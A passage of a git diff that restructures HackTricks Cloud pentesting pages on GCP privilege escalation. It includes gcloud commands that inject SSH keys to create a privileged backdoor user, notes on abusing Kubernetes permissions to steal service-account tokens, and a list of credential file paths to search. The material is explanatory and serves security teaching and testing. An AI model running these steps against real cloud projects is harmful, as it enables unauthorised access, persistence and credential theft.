+     ssh -i ./key alice@localhost
+     sudo id
+     ```
+
+#### **Create a new privileged user and add a SSH key**
+
+If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges:
+
+```bash
+# define the new account username
+NEWUSER="definitelynotahacker"
+
+# create a key
+ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""
+
+# create the input meta file
+NEWKEY="$(cat ./key.pub)"
+echo "$NEWUSER:$NEWKEY" > ./meta.txt
+
+# update the instance metadata
+gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt
+
+# ssh to the new account
+ssh -i ./key "$NEWUSER"@localhost
+```
+
+#### SSH keys at project level 
+
+It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide:
+
+1. **Apply SSH Keys at the Project Level:**
+
+   - Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled.
+
+     ```bash
+     gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
+     ```
+
+2. **SSH into Instances Using Project-Wide Keys:**
+   - With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access.
+   - A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access.
+
+## References
+
+- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md
new file mode 100644
index 000000000..0d19418a2
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md
@@ -0,0 +1,91 @@
+# GCP - Container Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## container
+
+### `container.clusters.get`
+
+This permission allows to **gather credentials for the Kubernetes cluster** using something like:
+
+```bash
+gcloud container clusters get-credentials  --zone 
+```
+
+Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but hey are useful to find miss-configurations in the environment.
+
+> [!NOTE]
+> Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet.
+
+If you don't have this permission you can still access the cluster, but you need to **create your own kubectl config file** with the clusters info. A new generated one looks like this:
+
+```yaml
+apiVersion: v1
+clusters:
+  - cluster:
+      certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMRENDQXBTZ0F3SUJBZ0lRRzNaQmJTSVlzeVRPR1FYODRyNDF3REFOQmdrcWhraUc5dzBCQVFzRkFEQXYKTVMwd0t3WURWUVFERXlRMk9UQXhZVEZoWlMweE56ZGxMVFF5TkdZdE9HVmhOaTAzWVdFM01qVmhNR05tTkdFdwpJQmNOTWpJeE1qQTBNakl4T1RJMFdoZ1BNakExTWpFeE1qWXlNekU1TWpSYU1DOHhMVEFyQmdOVkJBTVRKRFk1Ck1ERmhNV0ZsTFRFM04yVXROREkwWmkwNFpXRTJMVGRoWVRjeU5XRXdZMlkwWVRDQ0FhSXdEUVlKS29aSWh2Y04KQVFFQkJRQURnZ0dQQURDQ0FZb0NnZ0dCQU00TWhGemJ3Y3VEQXhiNGt5WndrNEdGNXRHaTZmb0pydExUWkI4Rgo5TDM4a2V2SUVWTHpqVmtoSklpNllnSHg4SytBUHl4RHJQaEhXMk5PczFNMmpyUXJLSHV6M0dXUEtRUmtUWElRClBoMy9MMDVtbURwRGxQK3hKdzI2SFFqdkE2Zy84MFNLakZjRXdKRVhZbkNMMy8yaFBFMzdxN3hZbktwTWdKVWYKVnoxOVhwNEhvbURvOEhUN2JXUTJKWTVESVZPTWNpbDhkdDZQd3FUYmlLNjJoQzNRTHozNzNIbFZxaiszNy90RgpmMmVwUUdFOG90a0VVOFlHQ3FsRTdzaVllWEFqbUQ4bFZENVc5dk1RNXJ0TW8vRHBTVGNxRVZUSzJQWk1rc0hyCmMwbGVPTS9LeXhnaS93TlBRdW5oQ2hnRUJIZTVzRmNxdmRLQ1pmUFovZVI1Qk0vc0w1WFNmTE9sWWJLa2xFL1YKNFBLNHRMVmpiYVg1VU9zMUZIVXMrL3IyL1BKQ2hJTkRaVTV2VjU0L1c5NWk4RnJZaUpEYUVGN0pveXJvUGNuMwpmTmNjQ2x1eGpOY1NsZ01ISGZKRzZqb0FXLzB0b2U3ek05RHlQOFh3NW44Zm5lQm5aVTFnYXNKREZIYVlZbXpGCitoQzFETmVaWXNibWNxOGVPVG9LOFBKRjZ3SURBUUFCbzBJd1FEQU9CZ05WSFE4QkFmOEVCQU1DQWdRd0R3WUQKVlIwVEFRSC9CQVV3QXdFQi96QWRCZ05WSFE0RUZnUVU5UkhvQXlxY3RWSDVIcmhQZ1BjYzF6Sm9kWFV3RFFZSgpLb1pJaHZjTkFRRUxCUUFEZ2dHQkFLbnp3VEx0QlJBVE1KRVB4TlBNbmU2UUNqZDJZTDgxcC9oeVc1eWpYb2w5CllkMTRRNFVlVUJJVXI0QmJadzl0LzRBQ3ZlYUttVENaRCswZ2wyNXVzNzB3VlFvZCtleVhEK2I1RFBwUUR3Z1gKbkJLcFFCY1NEMkpvZ29tT3M3U1lPdWVQUHNrODVvdWEwREpXLytQRkY1WU5ublc3Z1VLT2hNZEtKcnhuYUVGZAprVVl1TVdPT0d4U29qVndmNUsyOVNCbGJ5YXhDNS9tOWkxSUtXV2piWnZPN0s4TTlYLytkcDVSMVJobDZOSVNqCi91SmQ3TDF2R0crSjNlSjZneGs4U2g2L28yRnhxZWFNdDladWw4MFk4STBZaGxXVmlnSFMwZmVBUU1NSzUrNzkKNmozOWtTZHFBYlhPaUVOMzduOWp2dVlNN1ZvQzlNUk1oYUNyQVNhR2ZqWEhtQThCdlIyQW5iQThTVGpQKzlSMQp6VWRpK3dsZ0V4bnFvVFpBcUVHRktuUTlQcjZDaDYvR0xWWStqYXhuR3lyUHFPYlpNZTVXUDFOUGs4NkxHSlhCCjc1elFvanEyRUpxanBNSjgxT0gzSkxOeXRTdmt4UDFwYklxTzV4QUV0OWxRMjh4N28vbnRuaWh1WmR6M0lCRU8KODdjMDdPRGxYNUJQd0hIdzZtKzZjUT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
+      server: https://34.123.141.28
+    name: gke_security-devbox_us-central1_autopilot-cluster-1
+contexts:
+  - context:
+      cluster: gke_security-devbox_us-central1_autopilot-cluster-1
+      user: gke_security-devbox_us-central1_autopilot-cluster-1
+    name: gke_security-devbox_us-central1_autopilot-cluster-1
+current-context: gke_security-devbox_us-central1_autopilot-cluster-1
+kind: Config
+preferences: {}
+users:
+  - name: gke_security-devbox_us-central1_autopilot-cluster-1
+    user:
+      auth-provider:
+        config:
+          access-token: 
+          cmd-args: config config-helper --format=json
+          cmd-path: gcloud
+          expiry: "2022-12-06T01:13:11Z"
+          expiry-key: "{.credential.token_expiry}"
+          token-key: "{.credential.access_token}"
+        name: gcp
+```
+
+### `container.roles.escalate` | `container.clusterRoles.escalate`
+
+**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour.
+
+**`container.roles.create`** and/or **`container.roles.update`** OR **`container.clusterRoles.create`** and/or **`container.clusterRoles.update`** respectively are **also** **necessary** to perform those privilege escalation actions.
+
+### `container.roles.bind` | `container.clusterRoles.bind`
+
+**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour.
+
+**`container.roleBindings.create`** and/or **`container.roleBindings.update`** OR **`container.clusterRoleBindings.create`** and/or **`container.clusterRoleBindings.update`** respectively are also **necessary** to perform those privilege escalation actions.
+
+### `container.cronJobs.create` | `container.cronJobs.update` | `container.daemonSets.create` | `container.daemonSets.update` | `container.deployments.create` | `container.deployments.update` | `container.jobs.create` | `container.jobs.update` | `container.pods.create` | `container.pods.update` | `container.replicaSets.create` | `container.replicaSets.update` | `container.replicationControllers.create` | `container.replicationControllers.update` | `container.scheduledJobs.create` | `container.scheduledJobs.update` | `container.statefulSets.create` | `container.statefulSets.update`
+
+All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\
+For more information check:
+
+As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used).
+
+### `container.secrets.get` | `container.secrets.list`
+
+As [**explained in this page**, ](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#listing-secrets)with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them.
+
+### `container.pods.exec`
+
+With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**.
+
+### `container.pods.portForward`
+
+As **explained in this page**, with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.**
+
+### `container.serviceAccounts.createToken`
+
+Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it.
+
+### `container.mutatingWebhookConfigurations.create` | `container.mutatingWebhookConfigurations.update`
+
+These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\
+For more information [**follow this link**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller).
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md
new file mode 100644
index 000000000..e90828d7e
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md
@@ -0,0 +1,29 @@
+# GCP - Deploymentmaneger Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## deploymentmanager
+
+### `deploymentmanager.deployments.create`
+
+This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it.
+
+You could actually **launch any resource** listed in `gcloud deployment-manager types list`
+
+In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.**
+
+### `deploymentmanager.deployments.update`
+
+This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful)
+
+Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.**
+
+### `deploymentmanager.deployments.setIamPolicy`
+
+This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous _deploymentmanager.deployments.create_ section.
+
+## References
+
+- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md
similarity index 77%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md
index ed0718452..bd601f58d 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md
@@ -1,27 +1,14 @@
 # GCP - IAM Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## IAM
 
 Find more information about IAM in:
 
-{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %}
-[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-iam-and-org-policies-enum.md
+{{#endref}}
 
 ### `iam.roles.update` (`iam.roles.get`)
 
@@ -116,9 +103,9 @@ The **iam.serviceAccounts.actAs permission** is like the **iam:PassRole permissi
 
 Impersonating a service account can be very useful to **obtain new and better privileges**. There are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating_a_service_account):
 
-* Authentication **using RSA private keys** (covered above)
-* Authorization **using Cloud IAM policies** (covered here)
-* **Deploying jobs on GCP services** (more applicable to the compromise of a user account)
+- Authentication **using RSA private keys** (covered above)
+- Authorization **using Cloud IAM policies** (covered here)
+- **Deploying jobs on GCP services** (more applicable to the compromise of a user account)
 
 ### `iam.serviceAccounts.getOpenIdToken`
 
@@ -143,28 +130,15 @@ curl -v -H "Authorization: Bearer id_token" https://some-cloud-run-uc.a.run.app
 
 Some services that support authentication via this kind of tokens are:
 
-* [Google Cloud Run](https://cloud.google.com/run/)
-* [Google Cloud Functions](https://cloud.google.com/functions/docs/)
-* [Google Identity Aware Proxy](https://cloud.google.com/iap/docs/authentication-howto)
-* [Google Cloud Endpoints](https://cloud.google.com/endpoints/docs/openapi/authenticating-users-google-id) (if using Google OIDC)
+- [Google Cloud Run](https://cloud.google.com/run/)
+- [Google Cloud Functions](https://cloud.google.com/functions/docs/)
+- [Google Identity Aware Proxy](https://cloud.google.com/iap/docs/authentication-howto)
+- [Google Cloud Endpoints](https://cloud.google.com/endpoints/docs/openapi/authenticating-users-google-id) (if using Google OIDC)
 
 You can find an example on how to create and OpenID token behalf a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py).
 
 ## References
 
-* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md
similarity index 56%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md
index 6b209238a..3d8668070 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md
@@ -1,27 +1,14 @@
 # GCP - KMS Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## KMS
 
 Info about KMS:
 
-{% content-ref url="../gcp-services/gcp-kms-enum.md" %}
-[gcp-kms-enum.md](../gcp-services/gcp-kms-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-kms-enum.md
+{{#endref}}
 
 Note that in KMS the **permission** are not only **inherited** from Orgs, Folders and Projects but also from **Keyrings**.
 
@@ -71,16 +58,14 @@ title: "KMS Decryption via Delegation"
 description: "Allows decryption via delegation"
 stage: "GA"
 includedPermissions:
-- "cloudkms.cryptoKeyVersions.useToDecryptViaDelegation"
+  - "cloudkms.cryptoKeyVersions.useToDecryptViaDelegation"
 ```
 
 2. **Create the Custom Role Using the gcloud CLI**: Use the following command to create the custom role in your Google Cloud project:
 
-{% code overflow="wrap" %}
 ```bash
 gcloud iam roles create kms_decryptor_via_delegation --project [YOUR_PROJECT_ID] --file custom_role.yaml
 ```
-{% endcode %}
 
 Replace `[YOUR_PROJECT_ID]` with your Google Cloud project ID.
 
@@ -100,17 +85,4 @@ gcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \
 
 Replace `[YOUR_PROJECT_ID]` and `[SERVICE_ACCOUNT_EMAIL]` with your project ID and the email of the service account, respectively.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
similarity index 54%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
index 8abd52c60..798518438 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
@@ -1,19 +1,6 @@
 # GCP - local privilege escalation ssh pivoting
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 in this scenario we are going to suppose that you **have compromised a non privilege account** inside a VM in a Compute Engine project.
 
@@ -39,7 +26,9 @@ Moreover, it's possible to add **userdata**, which is a script that will be **ex
 
 For more info check:
 
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
+{{#endref}}
 
 ## **Abusing IAM permissions**
 
@@ -47,11 +36,11 @@ Most of the following proposed permissions are **given to the default Compute SA
 
 Check the following permissions:
 
-* [**compute.instances.osLogin**](gcp-compute-privesc/#compute.instances.oslogin)
-* [**compute.instances.osAdminLogin**](gcp-compute-privesc/#compute.instances.osadminlogin)
-* [**compute.projects.setCommonInstanceMetadata**](gcp-compute-privesc/#compute.projects.setcommoninstancemetadata)
-* [**compute.instances.setMetadata**](gcp-compute-privesc/#compute.instances.setmetadata)
-* [**compute.instances.setIamPolicy**](gcp-compute-privesc/#compute.instances.setiampolicy)
+- [**compute.instances.osLogin**](gcp-compute-privesc/#compute.instances.oslogin)
+- [**compute.instances.osAdminLogin**](gcp-compute-privesc/#compute.instances.osadminlogin)
+- [**compute.projects.setCommonInstanceMetadata**](gcp-compute-privesc/#compute.projects.setcommoninstancemetadata)
+- [**compute.instances.setMetadata**](gcp-compute-privesc/#compute.instances.setmetadata)
+- [**compute.instances.setIamPolicy**](gcp-compute-privesc/#compute.instances.setiampolicy)
 
 ## Search for Keys in the filesystem
 
@@ -63,10 +52,10 @@ sudo find / -name "gcloud"
 
 These are the most interesting files:
 
-* `~/.config/gcloud/credentials.db`
-* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json`
-* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto`
-* `~/.credentials.json`
+- `~/.config/gcloud/credentials.db`
+- `~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json`
+- `~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto`
+- `~/.credentials.json`
 
 ### More API Keys regexes
 
@@ -104,19 +93,6 @@ grep -Pzr '(?s)
' \
 
 ## References
 
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md
new file mode 100644
index 000000000..6c155ac6a
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md
@@ -0,0 +1,25 @@
+# GCP - Generic Permissions Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Generic Interesting Permissions
+
+### \*.setIamPolicy
+
+If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.\
+This permission can also allow to **escalate to other principals** if the resource allow to execute code and the iam.ServiceAccounts.actAs is not necessary.
+
+- _cloudfunctions.functions.setIamPolicy_
+  - Modify the policy of a Cloud Function to allow yourself to invoke it.
+
+There are tens of resources types with this kind of permission, you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) searching for setIamPolicy.
+
+### \*.create, \*.update
+
+These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account.
+
+### \*ServiceAccount\*
+
+This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md
similarity index 60%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md
index 5d99557d8..8126e305e 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md
@@ -1,19 +1,6 @@
 # GCP - Network Docker Escape
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Initial State
 
@@ -63,20 +50,7 @@ This step authorizes the public key, enabling SSH connection with the correspond
 
 ## References
 
-* [https://www.ezequiel.tech/2020/08/dropping-shell-in.html](https://www.ezequiel.tech/2020/08/dropping-shell-in.html)
-* [https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities)
+- [https://www.ezequiel.tech/2020/08/dropping-shell-in.html](https://www.ezequiel.tech/2020/08/dropping-shell-in.html)
+- [https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
